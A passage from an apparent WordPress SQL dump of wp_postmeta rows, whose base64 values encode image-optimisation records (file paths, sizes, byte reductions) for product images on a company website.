AsImlkIjoxNDEzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTA2MiwiaWQiOjE0MTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMDY1LCJpZCI6MTQxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEwNjgsImlkIjoxNDEzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxOTMsInRpbWUiOjE0ODM1NzEwNzEsImlkIjoxNDEzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMzksInRpbWUiOjE0ODM1NzEwNzMsImlkIjoxNDEzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMjEsInRpbWUiOjE0ODM1NzEwNzYsImlkIjoxNDEzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMDc4LCJpZCI6MTQxM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTA4MSwiaWQiOjE0MTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEwODQsImlkIjoxNDEzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29519, 1412, 'wpfc_optimisation_reduction', '2090492'); 
INSERT INTO `wp_postmeta` VALUES (29520, 1412, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXIuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXIuanBnIiwicmVkdWN0aW9uIjoyMDkwMDYxLCJ0aW1lIjoxNDgzNTcxMDk1LCJpZCI6IjE0MTIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MjUtZmx1eC1yZW1vdmVyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTA5NywiaWQiOjE0MTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MjUtZmx1eC1yZW1vdmVyLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMTAwLCJpZCI6MTQxMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MjUtZmx1eC1yZW1vdmVyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzExMDMsImlkIjoxNDEyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMTA3LCJpZCI6MTQxMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MjUtZmx1eC1yZW1vdmVyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzExMDksImlkIjoxNDEyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MjUtZmx1eC1yZW1vdmVyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTExMiwiaWQiOjE0MTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MjUtZmx1eC1yZW1vdmVyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMTE0LCJpZCI6MTQxMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MjUtZmx1eC1yZW1vdmVyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzExMTcsImlkIjoxNDEyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MjUtZmx1eC1yZW1vdmVyLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxOTIsInRpbWUiOjE0ODM1NzExMjAsImlkIjoxNDEyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MjUtZmx1eC1yZW1vdmVyLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMDYsInRpbWUiOjE0ODM1NzExMjIsImlkIjoxNDEyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MjUtZmx1eC1yZW1vdmVyLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMjIsInRpbWUiOjE0ODM1NzExMjUsImlkIjoxNDEyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MjUtZmx1eC1yZW1vdmVyLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMTI3LCJpZCI6MTQxMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MjUtZmx1eC1yZW1vdmVyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTEzMCwiaWQiOjE0MTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MjUtZmx1eC1yZW1vdmVyLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzI1LWZsdXgtcmVtb3Zlci00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTcyNS1mbHV4LXJlbW92ZXItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzExMzQsImlkIjoxNDEyfV0='); 
INSERT INTO `wp_postmeta` VALUES (29521, 1411, 'wpfc_optimisation_reduction', '2057151'); 
INSERT INTO `wp_postmeta` VALUES (29522, 1411, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzIwLXByZWNpc2lvbi1jbGVhbmluZy1hZ2VudC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyMC1wcmVjaXNpb24tY2xlYW5pbmctYWdlbnQuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTcyMC1wcmVjaXNpb24tY2xlYW5pbmctYWdlbnQuanBnIiwicmVkdWN0aW9uIjoyMDU2NzEzLCJ0aW1lIjoxNDgzNTcxMTQ1LCJpZCI6IjE0MTEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyMC1wcmVjaXNpb24tY2xlYW5pbmctYWdlbnQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MjAtcHJlY2lzaW9uLWNsZWFuaW5nLWFnZW50LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzIwLXByZWNpc2lvbi1jbGVhbmluZy1hZ2VudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTE0NywiaWQiOjE0MTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzIwLXByZWNpc2lvbi1jbGVhbmluZy1hZ2VudC04MDB4NTMzLmpwZyIsIndpZHRo